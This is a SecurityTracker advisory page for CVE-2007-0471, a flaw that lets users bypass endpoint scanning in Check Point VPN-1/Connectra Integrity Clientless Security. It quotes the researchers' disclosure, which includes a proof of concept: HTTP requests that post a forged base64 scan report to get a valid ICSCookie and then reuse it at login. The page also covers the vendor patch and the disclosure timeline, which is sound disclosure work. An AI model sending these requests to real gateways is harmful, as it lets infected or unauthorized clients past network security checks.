SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com






Category:   Application (VPN)  >   FireWall-1/VPN-1 Vendors:   Check Point
Check Point VPN-1 Integrity Clientless Security Lets Users Bypass the Scanning Function
SecurityTracker Alert ID:  1017559
SecurityTracker URL:  http://securitytracker.com/id/1017559
CVE Reference:   CVE-2007-0471   (Links to External Site)
Updated:  May 19 2008
Original Entry Date:  Jan 25 2007
Impact:   Host/resource access via network
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): R55, R55W, R60, R61, R62; ICS version3.x and prior
Description:   A vulnerability was reported in Check Point VPN-1. A user can bypass the scanning function.

A user can spoof valid scan results on a client system, allowing the client system to connect to the network as if a successful scan has occured when it has not. Successful authentication is still required to connect to the network.

The following versions are affected:

VPN-1 Power/UTM (Pro/Express) NGX R62
VPN-1 Power/UTM (Pro/Express) NGX R61
VPN-1 Power/UTM (Pro/Express) NGX R60
VPN-1 Power/UTM (Pro/Express) NG AI R55W
VPN-1 Power/UTM (Pro/Express) NG AI R55

Check Point Connectra is also affected.

The vulnerability resides in the optional Integrity Clientless Security (ICS) component, where a user can send a "good" report to the '/sre/params.php' page to obtain a valid ICSCookie authentication value from the server which can then be used to bypass the endpoint security test results.

The vendor was notified on December 24, 2006.

Roni Bachar and Nir Goldshlager discovered this vulnerability.

Impact:   A user can bypass the scanning function to potentially gain access to the network.
Solution:   The vendor has issued hotfixes for VPN-1.

The Check Point advisories are available at:

http://secureknowledge.checkpoint.com/SecureKnowledge/viewSolutionDocument.do?lid=sk32472
http://www.checkpoint.com/downloads/latest/hfa/vpn1_security/index.html

Vendor URL:  secureknowledge.checkpoint.com/SecureKnowledge/viewSolutionDocument.do?lid=sk32472 (Links to External Site)
Cause:   Authentication error
Underlying OS:   Linux (Any), UNIX (OS X), UNIX (Solaris - SunOS), Windows (Any)

Message History:   None.


 Source Message Contents

Date:  Mon, 22 Jan 2007 07:37:29 +0200
Subject:  Check Point Connectra End Point security bypass

I. INTRODUCTION

Check Point Connectra is a complete Web Security Gateway that provides
SSL VPN access and comprehensive endpoint and integrated intrusion
prevention 
Security in a single unified remote access solution. By combining both SSL
VPN connectivity and security in one solution, organizations can effectively
deploy SSL VPNs Safely and securely to a diverse set of remote users while
ensuring the confidentiality and integrity of information that is critical
to the success of any business.

For more Information please refer to:
http://www.checkpoint.com/products/connectra/index.html

II. DESCRIPTION

One of the major things in Check Point Connectra is Comprehensive endpoint
security.
Before a client connects to the internal network a test is being done on the
client to check if there is any security hazard on his computer. If a hazard
is detected the user is prompted with the hazard details and asked to run
the test again before getting the ability to login to the network.

A bypass to this test has been detected by Roni Bachar and Nir Goldshlager.
A user with a security hazard or a Trojan can bypass the end point security
tests and login to the network with a security hazard on his computer.  The
bypass is being done by sending a "good" report to the /sre/params.php page
after sending the report a set cookie will be send from the server to the
client. This cookie can be used to bypass the endpoint security findings.

The bypass was detected on the latest version of checkpoint connectra R62.

III. EXPLOITATION

The vulnerability can be exploited by doing the following stages:

Sending a post request as followed:

POST https://serverip/sre/params.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: ICS_Secure 
Host: serverip
Content-Length: 251
Cache-Control: no-cache
Cookie: ICS_Test_Cookie=1
	
Report=PD94bWwgdmVyc2lvbj0iMS4wIj8+Cgo8U3JlU2NhblJlcG9ydCBWZXJzaW9uPSIzLjcuM
TE2LjAiPgoJPFVzZXJJbmZvIFdpbkRvbWFpbj0iIiBXaW5Vc2VyPSJyb25pIiBXaW5Vc2VyQ2F0Y
WxvZz0iQzpcRG9jdW1lbnRzIGFuZCBTZXR0aW5nc1xyb25pLkxFTk9WTy00RkZFRjRFMyIvPgo8L
1NyZVNjYW5SZXBvcnQ+Cg==


After sending the request a Set-Cookie will be received from the Check Point
Connectra server

HTTP/1.1 200 OK
Date: Fri, 15 Dec 2006 17:16:19 GMT
Server: CPWS
Last-Modified: Fri, 15 Dec 2006 17:16:19 GMT
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: ICSCookie=ffbe7a3740e0db1c2d11b2c6b24c917d; expires=Tue, 13 Sep
2016 17:16:19 GMT; path=/; secure
Content-Length: 0
Content-Type: text/html

This ICSCookie is needed to be enteredd into the next request

GET https://serverip/Login/Login?LangCode= HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-shockwave-flash, application/vnd.ms-excel,  
application/vnd.ms-powerpoint, application/msword, */* 
Accept-Language: en-us
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR
1.1.4322; .NET CLR 2.0.50727) 
Host: serverip
Connection: Keep-Alive
Cookie: CheckCookieSupport=1; ICSCookie=ffbe7a3740e0db1c2d11b2c6b24c917d


IV. WORKAROUND

Check point released a patch for this vulnerability.


V. DISCLOSURE TIMELINE

20.12.06  First Identification of the flaw
24.12.06  Reporting the flaw to checkpoint
27.12.06  Meeting checkpoint security stuff 
22.01.07 Publishing the vulnerability.
22.01.07 Checkpoint Released a patch for the vulnerability 

VI. CREDITS

The vulnerability was discovered by Roni Bachar and Nir Goldshlager.




 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

Copyright 2014, SecurityGlobal.net LLC